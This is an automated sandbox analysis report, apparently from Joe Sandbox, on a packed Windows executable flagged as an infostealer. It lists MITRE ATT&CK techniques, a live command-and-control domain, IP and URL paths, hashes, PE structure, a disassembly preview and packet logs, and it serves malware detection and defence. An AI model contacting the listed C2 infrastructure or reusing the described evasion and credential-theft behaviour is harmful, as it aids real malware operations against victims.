Source: C:\Users\user\Desktop\EwhnoHx0n5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49727 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
EwhnoHx0n5.exe58%VirustotalBrowse
EwhnoHx0n5.exe58%ReversingLabsWin32.Ransomware.Generic
EwhnoHx0n5.exe100%AviraTR/Crypt.TPM.Gen
EwhnoHx0n5.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686269630%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    home.fiveth5ht.top
    		5.101.3.217
    		truefalse
      		high
      httpbin.org
      		3.218.7.103
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
        • Avira URL Cloud: safe
        		unknown
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlEwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQEwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513066936.0000000001871000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://html4/loose.dtdEwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#EwhnoHx0n5.exefalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://httpbin.org/ipbeforeEwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlEwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#EwhnoHx0n5.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSEwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.se/docs/http-cookies.html#EwhnoHx0n5.exefalse
                          		high
                          https://curl.se/docs/alt-svc.htmlEwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://.cssEwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.jpgEwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                5.101.3.217
                                		home.fiveth5ht.topRussian Federation
                                		34665PINDC-ASRUfalse
                                3.218.7.103
                                		httpbin.orgUnited States
                                		14618AMAZON-AESUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581252
                                Start date and time:2024-12-27 09:06:44 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 7s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:5
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:EwhnoHx0n5.exe
                                renamed because original name is a hash value
                                Original Sample Name:4c88ff06e9f5d8aaf6b642eb809dd2ff.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                5.101.3.217PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                3.218.7.103PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                  YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                      Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                        DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                          xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                            lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                              w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  httpbin.orgPqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                  • 3.218.7.103
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                  • 3.218.7.103
                                                  3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                  • 34.226.108.155
                                                  4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  • 34.226.108.155
                                                  xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                  • 34.226.108.155
                                                  w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  home.fiveth5ht.topPqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  s-part-0035.t-0009.t-msedge.netonaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.246.63
                                                  ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  60Zxcx88Uv.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.246.63
                                                  7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  1fi2LiofgW.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.246.63
                                                  zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                  • 13.107.246.63
                                                  54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                  • 13.107.246.63

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PINDC-ASRUPqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                  • 5.101.3.217
                                                  6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                  • 91.215.85.11
                                                  Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                  • 91.215.85.142
                                                  AMAZON-AESUSPqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                  • 3.218.7.103
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                  • 3.218.7.103
                                                  3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                  • 34.226.108.155
                                                  DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                  • 3.218.7.103
                                                  4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  • 34.226.108.155
                                                  xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                  • 3.218.7.103
                                                  8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                  • 34.226.108.155

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  No created / dropped files found

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.985915457280148
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:EwhnoHx0n5.exe
                                                  File size:4'462'592 bytes
                                                  MD5:4c88ff06e9f5d8aaf6b642eb809dd2ff
                                                  SHA1:08af05a701deb7cb5863567cf8a63bfce814c07d
                                                  SHA256:8fa7158a6212803480850dec0236641a4a249216778d0cef9a1d82738566af98
                                                  SHA512:3709f76fc1f8c25c705e9325f914f5ae7b87d35b3136c28c3cc427eceba946d47a353baa0d8cc4a0c85eb61e37ffad4c478704cf437dc0b3adaa912793dcc581
                                                  SSDEEP:98304:luk8dUe4UmUcvXT/aCnlXt2csbEqkpe6aYp2reuju193f:lR8dUem9vuCnfRvqweXr0Hf
                                                  TLSH:9726334ED7546BF3C28FCB3DBAD1A0B956FCE0A935F8B244137859BC683A6416421ED0
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2... ....... I...@..........................P.......&D...@... ............................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x1022000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                  DLL Characteristics:DYNAMIC_BASE
                                                  Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                  Authenticode Signature

                                                  Signature Valid:
                                                  Signature Issuer:
                                                  Signature Validation Error:
                                                  Error Number:
                                                  Not Before, Not After
                                                    Subject Chain
                                                      Version:
                                                      Thumbprint MD5:
                                                      Thumbprint SHA-1:
                                                      Thumbprint SHA-256:
                                                      Serial:

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp 00007FCBA0C1418Ah
                                                      psadbw mm0, qword ptr [ebx+00h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      jmp 00007FCBA0C16185h
                                                      add byte ptr [edx], al
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], dh
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], ch
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [esi], al
                                                      add byte ptr [eax], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [edx], ecx
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      or byte ptr [eax+00000000h], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add al, 00h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      and al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], eax
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      and al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], eax
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc1ffc00x10fnsraptz
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc1ff700x18fnsraptz
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      0x10000x6db0000x288a00c3294a2f9e776ce54e3b192f02682391unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x6dc0000x1ac0x2005508199accf3cf8348dd10ebf4967352False0.583984375data4.538450135579209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      0x6de0000x38d0000x2009341f30d5a42c4b79eddb1841be18218unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      fnsraptz0xa6b0000x1b60000x1b5200a39138b1a43c9e104a540da0928c30f5False0.9945907876394052data7.95651354910041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      qkzalnio0xc210000x10000x4003264b79d8cb10e9a14b164183db9465cFalse0.7939453125data6.2108752336856154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .taggant0xc220000x30000x22002e0cc20c6ed2bac64ecc6ce5f556daf7False0.05514705882352941DOS executable (COM)0.635619287468579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0xc1ffd00x152ASCII text, with CRLF line terminators0.6479289940828402

                                                      Imports

                                                      DLLImport
                                                      kernel32.dlllstrcpy

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 27, 2024 09:07:39.324563980 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:39.324634075 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:39.324708939 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:39.346550941 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:39.346587896 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.222374916 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.224447012 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.224477053 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.225934029 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.226084948 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.227821112 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.227900982 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.286963940 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.286989927 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.333827019 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.336160898 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.383348942 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.666089058 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.666213989 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:41.666285038 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.676435947 CET49716443192.168.2.93.218.7.103
                                                      Dec 27, 2024 09:07:41.676455975 CET443497163.218.7.103192.168.2.9
                                                      Dec 27, 2024 09:07:44.422456980 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.542120934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.542202950 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.544317007 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:44.664053917 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664081097 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:44.664091110 CET80497275.101.3.217192.168.2.9
